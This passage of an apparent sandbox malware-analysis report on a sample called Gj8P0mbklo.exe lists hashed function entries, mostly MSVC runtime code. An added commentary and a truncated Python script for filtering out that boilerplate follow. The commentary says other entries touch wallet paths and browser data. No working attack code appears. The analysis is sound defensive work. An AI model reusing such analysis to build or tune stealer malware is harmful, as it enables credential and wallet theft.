                                                                                                                                                                                            • Instruction Fuzzy Hash: 0B51CE71B005168FDB09CF6DC8421BEB7B2EB983A4B69C63DD506DB748E630E911CB80
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a1b36d80149b9a0878556a05ebcaa603ece604499cb7d2b30698b6347d275ee2
                                                                                                                                                                                            • Instruction ID: 0516ffe292abc501bf8406bc9e844388aad7b23e22fb93c68bb9a1451ad358a2
                                                                                                                                                                                            • Opcode Fuzzy Hash: a1b36d80149b9a0878556a05ebcaa603ece604499cb7d2b30698b6347d275ee2
                                                                                                                                                                                            • Instruction Fuzzy Hash: D2517E72D00219EFDF15CF98C850AEEBBB5FF88304F4A8459E915AB241D7389A51CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 8c8b0b9c1a62480a236227887d92c755a46d6c3b786c99c51580d612cbc1c266
                                                                                                                                                                                            • Instruction ID: ee173355a4164c5ecead21d314a0b9fdb62f7e2625b5fd2a7bc56c70aa2a749b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c8b0b9c1a62480a236227887d92c755a46d6c3b786c99c51580d612cbc1c266
                                                                                                                                                                                            • Instruction Fuzzy Hash: B441B721219BC48FC739DE6C881159A7FE0DF66215B444B8DE8DB87B83C214E64DC7E6
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                            • Instruction ID: db86fde20ce7f36d637c85cb23506fa5ddd1482cf61301c9f1b1abaa7f2ba24e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C119E7720C04143DA37863DC4B86F7A395EBD632072ECB7AF0798BB26D12BD8009900
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d0306b55f0b0c0deecf23286ed4b9f98b611648aebeb63247df45b47797c7eec
                                                                                                                                                                                            • Instruction ID: b699947cbd32bc414428b11567ce738cdb0b76b883daacab48136196b0ac42e4
                                                                                                                                                                                            • Opcode Fuzzy Hash: d0306b55f0b0c0deecf23286ed4b9f98b611648aebeb63247df45b47797c7eec
                                                                                                                                                                                            • Instruction Fuzzy Hash: B30188319350B10A870E8B3D9821937BBA5EB4335334B03ABD987EB4D2D419E524D7A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 00374411
• std::_Lockit::_Lockit.LIBCPMT ref: 0037442C
• std::_Lockit::~_Lockit.LIBCPMT ref: 0037444C
• std::_Lockit::~_Lockit.LIBCPMT ref: 00374473
• std::_Lockit::_Lockit.LIBCPMT ref: 003744DE
• std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00374526
• __Getctype.LIBCPMT ref: 0037453C
• std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0037457D
• std::_Lockit::~_Lockit.LIBCPMT ref: 00374612
• std::_Facet_Register.LIBCPMT ref: 00374618
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
• String ID: :7$:7$bad locale name
• API String ID: 103145292-3064447370
• Opcode ID: 7cfc9a161db8ff16fffb995a48f1f2ab125cf9be17bd76e6622f43544073f73b
• Instruction ID: eab3c34a8aaf7c7128417c010ddef0f458362f62cbd531d0b3a5a5ca86b6208f
• Opcode Fuzzy Hash: 7cfc9a161db8ff16fffb995a48f1f2ab125cf9be17bd76e6622f43544073f73b
• Instruction Fuzzy Hash: E471C0B5D002099FDF23DFA4D881BAEB7B4BF15310F058169E808AB241EB38F945CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• type_info::operator==.LIBVCRUNTIME ref: 00378FDD
• ___TypeMatch.LIBVCRUNTIME ref: 003790EB
• _UnwindNestedFrames.LIBCMT ref: 0037923D
• CallUnexpected.LIBVCRUNTIME ref: 00379258
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
• String ID: Le9$csm$csm$csm
• API String ID: 2751267872-2961622526
• Opcode ID: f2c8e6e4eef536a19cd1f4caa1801b1731ca5d0463f707117a3818ce165242ab
• Instruction ID: 25e71516aa3ff3fc758817852c35c9b55f1508085f60c996965ad348fe6f1760
• Opcode Fuzzy Hash: f2c8e6e4eef536a19cd1f4caa1801b1731ca5d0463f707117a3818ce165242ab
• Instruction Fuzzy Hash: 34B18271800209EFCF36DFA4C885AAEB7B5FF05310F51865AE8196B212D739DA61CB91
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003760E6
• GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 003760F4
• GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00376105
• GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00376116
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
• API String ID: 667068680-1247241052
• Opcode ID: 3a6500a137421b9e76ff6b17a31c074f8fa25a0fc2aea7f51f78e83f4c57d4a2
• Instruction ID: aab95f24910d0b7a6c7255077f535f8fb571f06faae2331900e257ea82db8a7b
• Opcode Fuzzy Hash: 3a6500a137421b9e76ff6b17a31c074f8fa25a0fc2aea7f51f78e83f4c57d4a2
• Instruction Fuzzy Hash: 22E0EC7995B310AB8B036F75BC4F8C63EADEA4AB11B010426F50AD23A0DAB608418B90
Uniqueness
Uniqueness Score: -1.00%

APIs
• Concurrency::cancel_current_task.LIBCPMT ref: 0036453A
• ___std_exception_copy.LIBVCRUNTIME ref: 003647D9
  • Part of subcall function 00356470: ___std_exception_destroy.LIBVCRUNTIME ref: 0035647E
  • Part of subcall function 00356470: ___std_exception_destroy.LIBVCRUNTIME ref: 0035648D
Strings
• parse_error, xrefs: 003645EE
• parse error, xrefs: 00364668
• value, xrefs: 003644A4
• attempting to parse an empty input; check that your input string or stream contains the expected JSON, xrefs: 0036443D
• Te9, xrefs: 003647C6
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: ___std_exception_destroy$Concurrency::cancel_current_task___std_exception_copy
• String ID: Te9$attempting to parse an empty input; check that your input string or stream contains the expected JSON$parse error$parse_error$value
• API String ID: 1464283508-2277852587
• Opcode ID: 5396b17bf77cbed8277725f7483356ac4adab02a615dc24651de6bfbb6586638
• Instruction ID: 800915b8e5caefa3e96766c24f61e3ba53860f9cc16b9c5b166e9df76fd2cef4
• Opcode Fuzzy Hash: 5396b17bf77cbed8277725f7483356ac4adab02a615dc24651de6bfbb6586638
• Instruction Fuzzy Hash: ECB1F171D002488BDB1ADFA4CC96BEDBB71FF16300F14865DE4057B692EB75AA88CB50
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: _strrchr
• String ID:
• API String ID: 3213747228-0
• Opcode ID: 5ee2fe975661c3f3a06b09353ebd3b379a61c661aa420a013c28599f51580a80
• Instruction ID: 406cdf572f805bf3130706eca97950e6f59ea244c5241cfc9afbe1245dbe13c0
• Opcode Fuzzy Hash: 5ee2fe975661c3f3a06b09353ebd3b379a61c661aa420a013c28599f51580a80
• Instruction Fuzzy Hash: 20B16572A00355AFDB17EF28CC82BBE7BA5EF55310F554196E904AF282DB74E901C7A0
Uniqueness
Uniqueness Score: -1.00%

APIs
• _ValidateLocalCookies.LIBCMT ref: 003763E7
• ___except_validate_context_record.LIBVCRUNTIME ref: 003763EF
• _ValidateLocalCookies.LIBCMT ref: 00376478
• __IsNonwritableInCurrentImage.LIBCMT ref: 003764A3
• _ValidateLocalCookies.LIBCMT ref: 003764F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
• Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 40a4a2934f0eece077e3420a29fb102131f8cd031ea83955e4564b7b4e2b8b0e
• Instruction ID: e7d217fb82871c6e07f303ff35179e3581c6dffb8b9e4f5c33305d9feb3b96a6
                                                                                                                                                                                            • Opcode Fuzzy Hash: 40a4a2934f0eece077e3420a29fb102131f8cd031ea83955e4564b7b4e2b8b0e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441D534A00609ABCF22DF69C896A9EBBB4FF05324F14C155E81C5F392C7399906CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,145F793C,?,00386C29,?,?,00000000,?), ref: 00386BDB
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                            • Opcode ID: fcab7bffe94a1f70c86213288753d4096fbfa6b0a91949de107cb1a83888be71
                                                                                                                                                                                            • Instruction ID: 9e6eeecf0536ec739f1a9af7f076692a2d52c22e99178110e3ce9ea3e099f5e0
                                                                                                                                                                                            • Opcode Fuzzy Hash: fcab7bffe94a1f70c86213288753d4096fbfa6b0a91949de107cb1a83888be71
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1021B772A05311ABCB23BB26DC83E6A7B5C9B41764F260295E906E73D0DB31ED01C7E0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetCPInfo.KERNEL32(02751DB8,02751DB8,?,7FFFFFFF,?,00394288,02751DB8,02751DB8,?,02751DB8,?,?,?,?,02751DB8,?), ref: 0039405E
                                                                                                                                                                                            • __freea.LIBCMT ref: 003941F3
                                                                                                                                                                                            • __freea.LIBCMT ref: 003941F9
                                                                                                                                                                                            • __freea.LIBCMT ref: 0039422F
                                                                                                                                                                                            • __freea.LIBCMT ref: 00394235
                                                                                                                                                                                            • __freea.LIBCMT ref: 00394245
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __freea$Info
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 541289543-0
                                                                                                                                                                                            • Opcode ID: 47ca05893abe6710b3b301d7d6a755ee855877cb8afdd9c5c860b599b5aff506
                                                                                                                                                                                            • Instruction ID: aefa2736bc18c13fec95902c287b750584b190208eedb8b74e8a69d51b3ea1ce
                                                                                                                                                                                            • Opcode Fuzzy Hash: 47ca05893abe6710b3b301d7d6a755ee855877cb8afdd9c5c860b599b5aff506
                                                                                                                                                                                            • Instruction Fuzzy Hash: 747119729002095BDF239F649C42FAFB7F9EF45314F160459FA54AB282D735DC468760
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00378971,0037672C,00375534), ref: 00378988
                                                                                                                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00378996
                                                                                                                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003789AF
                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,00378971,0037672C,00375534), ref: 00378A01
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3852720340-0
                                                                                                                                                                                            • Opcode ID: 37b5c098edf7e975bdda2bd463c3d585104a6f8d5baa705ceb69e7feceadd8c5
                                                                                                                                                                                            • Instruction ID: 0c4786fb3cc3f636b02172b90e19eb328bd4b7775a42b6f32e6e512a108fc2b5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 37b5c098edf7e975bdda2bd463c3d585104a6f8d5baa705ceb69e7feceadd8c5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1201B13354D3155EE63B27787CCAA7A2A9CEB06374F60832EF628592E0FF194C009685
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: at line $, column $Te9
                                                                                                                                                                                            • API String ID: 0-550572365
                                                                                                                                                                                            • Opcode ID: 32bca245c2d60094fc3b68f2e590a821b6faffad71d1751a2abfb384ff882429
                                                                                                                                                                                            • Instruction ID: 2f1d4b2b79d394278bdc2f0dea7447959f14048f4e8cc3ad5f75f93312b7669a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 32bca245c2d60094fc3b68f2e590a821b6faffad71d1751a2abfb384ff882429
                                                                                                                                                                                            • Instruction Fuzzy Hash: 98516971A002045BCB1ADF68CC96EEEBBB9EF45310F44452DF905AB762C774AE49C7A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Strings
                                                                                                                                                                                            • C:\Users\user\Desktop\Gj8P0mbklo.exe, xrefs: 00384D63
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\Gj8P0mbklo.exe
                                                                                                                                                                                            • API String ID: 0-3216855326
                                                                                                                                                                                            • Opcode ID: 9fbcc4d7427ad1d38bebccf6ee648cd65bcb09164d35bfa7733aef9d12c28cab
                                                                                                                                                                                            • Instruction ID: d7d4e25acf808f6c79ce812bf03dd8edc6f0eb41e66d6e91596f9ee45955415e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fbcc4d7427ad1d38bebccf6ee648cd65bcb09164d35bfa7733aef9d12c28cab
                                                                                                                                                                                            • Instruction Fuzzy Hash: A021927160030BAFDB22BF70CC81A6BB7ACBF003687118595F9298BA51E731EC10C7A0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%
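
Most of the function entries in this part of the listing are MSVC runtime boilerplate rather than sample-specific logic: a SEH frame handler that validates the /GS security cookie (_ValidateLocalCookies, __IsNonwritableInCurrentImage, the "csm" constant that is the MSVC C++ exception code 0xE06D7363 as bytes), the UCRT module loader that refuses to fall back to an unrestricted LoadLibrary for api-ms-/ext-ms- names, a GetCPInfo/_freea code-page helper, per-thread data lookup via FLS with GetLastError preserved, and the CRT exit path that probes mscoree.dll for CorExitProcess. The Joe Sandbox-assigned API ID / String ID pairs identify these stubs reliably, so an analyst can filter them out and spend time on the entries that reference wallet paths, browser databases or network strings instead. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses entries in this listing format and marks the ones whose (API ID, String ID) pair matches a known CRT stub. The CRT function names it attributes to each pair are my assumption from the MSVC runtime sources, and the embedded sample consists of three entries abridged from this page (the Associated and Snapshot lines were dropped).

```python
"""Triage helper for Joe Sandbox "Function details" entries (added example, not report output)."""
import re
from typing import Dict, List, Tuple

# Three entries abridged from this report (Associated/Snapshot lines dropped for brevity).
SAMPLE = """\
APIs
• GetLastError.KERNEL32(?,?,00378971,0037672C,00375534), ref: 00378988
• ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00378996
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003789AF
• SetLastError.KERNEL32(00000000,00378971,0037672C,00375534), ref: 00378A01
Memory Dump Source
• Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
Similarity
• API ID: ErrorLastValue___vcrt_
• String ID:
• API String ID: 3852720340-0
• Instruction Fuzzy Hash: 1201B13354D3155EE63B27787CCAA7A2A9CEB06374F60832EF628592E0FF194C009685
Uniqueness Score: -1.00%
APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,145F793C,?,00386C29,?,?,00000000,?), ref: 00386BDB
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Instruction Fuzzy Hash: 1021B772A05311ABCB23BB26DC83E6A7B5C9B41764F260295E906E73D0DB31ED01C7E0
Uniqueness Score: -1.00%
Strings
• C:\\Users\\user\\Desktop\\Gj8P0mbklo.exe, xrefs: 00384D63
Similarity
• API ID:
• String ID: C:\\Users\\user\\Desktop\\Gj8P0mbklo.exe
• API String ID: 0-3216855326
• Instruction Fuzzy Hash: A021927160030BAFDB22BF70CC81A6BB7ACBF003687118595F9298BA51E731EC10C7A0
Uniqueness Score: -1.00%
"""

# (API ID, String ID) pairs from this report that are compiler/runtime boilerplate.
# The CRT function attributed to each pair is an assumption from the MSVC runtime
# sources, not something the report states.
CRT_BOILERPLATE: Dict[Tuple[str, str], str] = {
    ("CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record", "csm"):
        "CRT: SEH frame handler with /GS local-cookie validation ('csm' = C++ exception code 0xE06D7363)",
    ("FreeLibrary", "api-ms-$ext-ms-"):
        "CRT: UCRT try_get_module, no unrestricted LoadLibrary fallback for api-ms-/ext-ms- names",
    ("__freea$Info", ""):
        "CRT: GetCPInfo-based code-page helper with _alloca/_freea cleanup",
    ("ErrorLastValue___vcrt_", ""):
        "CRT: __vcrt_getptd, per-thread data via FLS with GetLastError preserved",
    ("AddressFreeHandleLibraryModuleProc", "CorExitProcess$mscoree.dll"):
        "CRT: exit path probing mscoree.dll for CorExitProcess (only relevant if the CLR is loaded)",
}

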